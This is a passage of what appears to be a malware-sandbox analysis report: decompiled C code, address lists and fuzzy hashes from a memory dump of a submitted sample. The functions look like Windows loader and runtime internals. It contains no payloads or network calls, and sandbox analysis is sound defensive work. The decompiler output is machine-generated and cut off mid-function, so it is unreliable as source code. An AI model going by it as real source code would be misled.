                                                    0x017ef0f4
                                                    0x017ef0f8
                                                    0x017ef100
                                                    0x017ef108
                                                    0x017ef10d
                                                    0x017ef115
                                                    0x017ef116
                                                    0x017ef11f
                                                    0x017ef123
                                                    0x017ef124
                                                    0x017ef12c
                                                    0x017ef130
                                                    0x017ef134
                                                    0x017ef13d
                                                    0x017ef144
                                                    0x017ef14b
                                                    0x017ef152
                                                    0x0182bab0
                                                    0x0182bab0
                                                    0x017ef158
                                                    0x017ef158
                                                    0x017ef15a
                                                    0x017ef160
                                                    0x017ef165
                                                    0x017ef166
                                                    0x017ef16f
                                                    0x017ef173
                                                    0x0182baa7
                                                    0x0182baa7
                                                    0x0182baab
                                                    0x00000000
                                                    0x017ef179
                                                    0x017ef18d
                                                    0x017ef191
                                                    0x0182baa2
                                                    0x00000000
                                                    0x017ef197
                                                    0x017ef19b
                                                    0x017ef1a2
                                                    0x017ef1a9
                                                    0x017ef1af
                                                    0x017ef1b2
                                                    0x017ef1b6
                                                    0x017ef1b9
                                                    0x017ef1c4
                                                    0x017ef1d8
                                                    0x017ef1df
                                                    0x017ef1e3
                                                    0x017ef1eb
                                                    0x017ef1ee
                                                    0x017ef1f4
                                                    0x017ef20f
                                                    0x0182bab7
                                                    0x0182babb
                                                    0x0182bacc
                                                    0x0182bad1
                                                    0x017ef215
                                                    0x017ef218
                                                    0x017ef226
                                                    0x017ef22b
                                                    0x00000000
                                                    0x017ef22b
                                                    0x017ef1f6
                                                    0x017ef1f6
                                                    0x017ef1f9
                                                    0x017ef1fb
                                                    0x017ef1fb
                                                    0x017ef1f4
                                                    0x017ef191
                                                    0x017ef173
                                                    0x017ef152
                                                    0x017ef203

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 259efc7b8808c29f8848937935dc412c404131f6ab1d7d5d92f70c6207e959c4
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: C7518972105715ABC321DF28C840A6BFBF8FF48710F00892EFA9687690E7B4E954CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01833540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E01833540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x18ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E017F0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01833706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E017FFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01833540;
						E017FFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0180DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01840C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E017F97C0();
					}
					return E017FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01833971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01833884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E017FFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E017F9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01833787(_a4,  &_v352, _t80);
						}
					}
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E017F95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                    0x01833552
                                                    0x0183355a
                                                    0x0183355d
                                                    0x01833566
                                                    0x01833567
                                                    0x0183357e
                                                    0x0183358f
                                                    0x018335a1
                                                    0x018335a5
                                                    0x0183366b
                                                    0x0183366b
                                                    0x0183366d
                                                    0x01833672
                                                    0x01833679
                                                    0x01833685
                                                    0x0183368d
                                                    0x0183369d
                                                    0x018336a7
                                                    0x018336b8
                                                    0x018336c6
                                                    0x018336c7
                                                    0x018336dc
                                                    0x018336e1
                                                    0x018336e7
                                                    0x018336e9
                                                    0x018336e9
                                                    0x01833703
                                                    0x01833703
                                                    0x018335b5
                                                    0x018335c0
                                                    0x018335c4
                                                    0x00000000
                                                    0x00000000
                                                    0x018335ca
                                                    0x018335d7
                                                    0x018335e2
                                                    0x018335e6
                                                    0x018335e8
                                                    0x018335f5
                                                    0x018335fa
                                                    0x01833603
                                                    0x01833604
                                                    0x01833609
                                                    0x0183360a
                                                    0x01833612
                                                    0x01833613
                                                    0x0183361e
                                                    0x01833622
                                                    0x01833628
                                                    0x0183362f
                                                    0x0183362f
                                                    0x01833636
                                                    0x01833638
                                                    0x0183363b
                                                    0x01833642
                                                    0x01833642
                                                    0x01833636
                                                    0x01833657
                                                    0x01833657
                                                    0x0183365c
                                                    0x01833662
                                                    0x01833669
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryHash
                                                    • API String ID: 0-2202222882
                                                    • Opcode ID: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
                                                    • Instruction ID: 5ec2a63f66d67e5331d07cf89e93475d68cc797e8f97b1ee691e2cfea8893ca2
                                                    • Opcode Fuzzy Hash: 30a942bda86116e7cd1323199f82de02a34c7d173b8e5696fbdd6037a443d1c3
                                                    • Instruction Fuzzy Hash: C14133B290052D9FDB219A54CC84FDEB77CAB44714F0445A9EB09AB241EB309F889FD5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 018805AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E018805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E018807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E017F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0187A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0187A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01881293(_t79, _v40, E018807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E017D7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0187138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                    0x018805c5
                                                    0x018805ca
                                                    0x018805d3
                                                    0x018806db
                                                    0x018806db
                                                    0x018806dd
                                                    0x018806e3
                                                    0x018806e3
                                                    0x018805dd
                                                    0x018805e7
                                                    0x018805f6
                                                    0x01880600
                                                    0x01880607
                                                    0x01880610
                                                    0x01880615
                                                    0x0188061a
                                                    0x0188061c
                                                    0x0188061e
                                                    0x01880624
                                                    0x01880625
                                                    0x01880627
                                                    0x01880628
                                                    0x01880631
                                                    0x01880640
                                                    0x0188064d
                                                    0x01880654
                                                    0x01880654
                                                    0x01880631
                                                    0x0188066d
                                                    0x01880674
                                                    0x00000000
                                                    0x00000000
                                                    0x01880692
                                                    0x0188069e
                                                    0x018806b0
                                                    0x018806a0
                                                    0x018806a9
                                                    0x018806a9
                                                    0x018806b8
                                                    0x018806d6
                                                    0x018806d6
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction ID: 3d684b9b541d7b4e2817123ee51c938e6b992ab7678e35906fa963443cc90084
                                                    • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                    • Instruction Fuzzy Hash: D531E63260474A6BE720EE28CD85F9B7BD9EBC4758F184129FA54DB281D770EA08C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01833884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E01833884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E017F9650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L017D4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E017F9650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                                    0x01833893
                                                    0x01833896
                                                    0x01833899
                                                    0x0183389f
                                                    0x018338a0
                                                    0x018338a4
                                                    0x018338a9
                                                    0x018338ac
                                                    0x018338ad
                                                    0x018338ae
                                                    0x018338af
                                                    0x018338b1
                                                    0x018338b4
                                                    0x018338bb
                                                    0x018338bc
                                                    0x018338bd
                                                    0x018338c4
                                                    0x018338c8
                                                    0x018338ca
                                                    0x018338ca
                                                    0x018338d5
                                                    0x0183393e
                                                    0x01833940
                                                    0x01833942
                                                    0x01833952
                                                    0x01833954
                                                    0x01833961
                                                    0x01833961
                                                    0x01833967
                                                    0x0183396e
                                                    0x0183396e
                                                    0x01833947
                                                    0x0183394c
                                                    0x00000000
                                                    0x0183394c
                                                    0x018338ea
                                                    0x018338ee
                                                    0x018338f8
                                                    0x018338f9
                                                    0x018338ff
                                                    0x01833900
                                                    0x01833902
                                                    0x01833903
                                                    0x0183390b
                                                    0x0183390f
                                                    0x01833950
                                                    0x00000000
                                                    0x01833950
                                                    0x01833915
                                                    0x0183391d
                                                    0x0183391d
                                                    0x01833922
                                                    0x01833926
                                                    0x00000000
                                                    0x01833928
                                                    0x0183392b
                                                    0x0183392b
                                                    0x01833935
                                                    0x01833937
                                                    0x01833937
                                                    0x00000000
                                                    0x01833935
                                                    0x01833926
                                                    0x018338f0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: BinaryName
                                                    • API String ID: 0-215506332
                                                    • Opcode ID: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
                                                    • Instruction ID: 0e82446ff37d13042102b66fb3944a3ca8cfe77fa96295d8c0cdc72a8919cdfb
                                                    • Opcode Fuzzy Hash: f110b8d9cd3f75db6adaa2ec66dec53af0d7bc8fd22c521a091eb7beb1ccb9ff
                                                    • Instruction Fuzzy Hash: 1331D13290151AEFEB16DA58C945E6BFB74FB81B20F1A4169AE15EB251D6309F00CBE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017ED294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E017ED294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x18ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E017D4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E017FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E017F98D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E017F95D0();
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                    0x017ed29c
                                                    0x017ed2a6
                                                    0x017ed2b1
                                                    0x017ed2b5
                                                    0x017ed2b6
                                                    0x017ed2bc
                                                    0x017ed2bd
                                                    0x017ed2be
                                                    0x017ed2bf
                                                    0x017ed2c2
                                                    0x017ed2c4
                                                    0x017ed2cc
                                                    0x017ed384
                                                    0x017ed34b
                                                    0x017ed34f
                                                    0x017ed350
                                                    0x017ed351
                                                    0x017ed35c
                                                    0x017ed35c
                                                    0x017ed2d6
                                                    0x017ed2da
                                                    0x017ed2e1
                                                    0x017ed361
                                                    0x017ed369
                                                    0x017ed36d
                                                    0x017ed2e3
                                                    0x017ed2e3
                                                    0x017ed2e3
                                                    0x017ed2e5
                                                    0x017ed2ed
                                                    0x017ed2f5
                                                    0x017ed2fa
                                                    0x017ed302
                                                    0x017ed303
                                                    0x017ed30b
                                                    0x017ed30f
                                                    0x017ed313
                                                    0x017ed318
                                                    0x017ed31c
                                                    0x017ed320
                                                    0x017ed379
                                                    0x017ed37d
                                                    0x00000000
                                                    0x00000000
                                                    0x0182affe
                                                    0x0182b001
                                                    0x0182b011
                                                    0x00000000
                                                    0x017ed322
                                                    0x017ed322
                                                    0x017ed330
                                                    0x017ed337
                                                    0x017ed35d
                                                    0x017ed339
                                                    0x017ed33f
                                                    0x017ed38c
                                                    0x017ed38c
                                                    0x017ed33f
                                                    0x017ed349
                                                    0x00000000
                                                    0x017ed349

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
                                                    • Instruction ID: 6eb4e36aa71413f3b2890c51e3f2dea0b0a1feca5acc667fb80ee6265cd4585d
                                                    • Opcode Fuzzy Hash: 7ff380a216853809309539ac7d8a275d5c7fbb36f55e61e86fd886cbf1a93696
                                                    • Instruction Fuzzy Hash: 02319FB5508305DFD321DF68C988A6BFBE8EB99654F40092EF995C7250E634DD04CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E017C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E017FBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E017FA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E017FA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L017D4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                    0x017c1b8f
                                                    0x017c1b9a
                                                    0x017c1b9c
                                                    0x017c1b9e
                                                    0x017c1ba3
                                                    0x01817010
                                                    0x01817010
                                                    0x00000000
                                                    0x017c1ba9
                                                    0x017c1ba9
                                                    0x017c1bae
                                                    0x00000000
                                                    0x017c1bc5
                                                    0x017c1bca
                                                    0x017c1bcf
                                                    0x017c1bd0
                                                    0x017c1bd1
                                                    0x017c1bd2
                                                    0x017c1bd6
                                                    0x017c1bdc
                                                    0x017c1be0
                                                    0x01816ffc
                                                    0x01817000
                                                    0x00000000
                                                    0x01817006
                                                    0x01817009
                                                    0x01817009
                                                    0x017c1be6
                                                    0x017c1bec
                                                    0x017c1c0b
                                                    0x017c1c0b
                                                    0x017c1c0c
                                                    0x017c1c11
                                                    0x017c1c12
                                                    0x017c1c15
                                                    0x017c1c1b
                                                    0x017c1c1f
                                                    0x017c1c31
                                                    0x017c1c33
                                                    0x01817026
                                                    0x01817026
                                                    0x017c1c21
                                                    0x017c1c24
                                                    0x017c1c24
                                                    0x017c1bee
                                                    0x017c1bee
                                                    0x017c1bf2
                                                    0x017c1c3a
                                                    0x017c1bf4
                                                    0x017c1bf4
                                                    0x017c1c05
                                                    0x017c1c05
                                                    0x017c1c09
                                                    0x017c1c3e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017c1c09
                                                    0x017c1bec
                                                    0x017c1be0
                                                    0x017c1bae
                                                    0x017c1c2e

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: WindowsExcludedProcs
                                                    • API String ID: 0-3583428290
                                                    • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction ID: 504255c9d31a172762b4ecac8bfc47535654b1d0b11d2429c74a149350a5b26b
                                                    • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                    • Instruction Fuzzy Hash: AA21C57B601229EBDB32DA59C844F9BFBADAF41B50F45447DFA04DB205D630DE0197A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E017DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                    0x017df71d
                                                    0x017df722
                                                    0x017df726
                                                    0x01824770
                                                    0x017df765
                                                    0x017df769
                                                    0x017df769
                                                    0x017df732
                                                    0x0182477a
                                                    0x00000000
                                                    0x0182477a
                                                    0x017df738
                                                    0x017df73a
                                                    0x017df73c
                                                    0x017df73f
                                                    0x017df746
                                                    0x017df778
                                                    0x017df7a9
                                                    0x017df7a9
                                                    0x017df754
                                                    0x017df75a
                                                    0x017df75d
                                                    0x017df75f
                                                    0x017df761
                                                    0x017df76f
                                                    0x017df771
                                                    0x017df771
                                                    0x017df76f
                                                    0x017df763
                                                    0x00000000
                                                    0x017df763
                                                    0x017df77d
                                                    0x017df7a3
                                                    0x017df7a5
                                                    0x00000000
                                                    0x017df7a5
                                                    0x017df77f
                                                    0x017df782
                                                    0x017df784
                                                    0x017df786
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017df788
                                                    0x017df748
                                                    0x017df74d
                                                    0x017df78d
                                                    0x017df793
                                                    0x017df7b7
                                                    0x017df7bc
                                                    0x00000000
                                                    0x017df7bc
                                                    0x017df798
                                                    0x00000000
                                                    0x00000000
                                                    0x017df79d
                                                    0x017df7b0
                                                    0x00000000
                                                    0x017df7b0
                                                    0x017df79f
                                                    0x00000000
                                                    0x017df74f
                                                    0x017df74f
                                                    0x00000000
                                                    0x017df74f

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Actx
                                                    • API String ID: 0-89312691
                                                    • Opcode ID: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
                                                    • Instruction ID: c5ea72c6aa861c1c4f19f3028517c2f99abd05aa28cbb457f0d5a9954675ab7e
                                                    • Opcode Fuzzy Hash: 9d2df01b3188c9530f91be732d1258c1dc013408d04efdedcea8c75470f9944e
                                                    • Instruction Fuzzy Hash: 4311E23430560A8BEB254E1CC9907F6F6B5AB95234FA7457AE467CB391DB70C8438340
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01868DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E01868DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1890d50);
				E0180D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01845720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
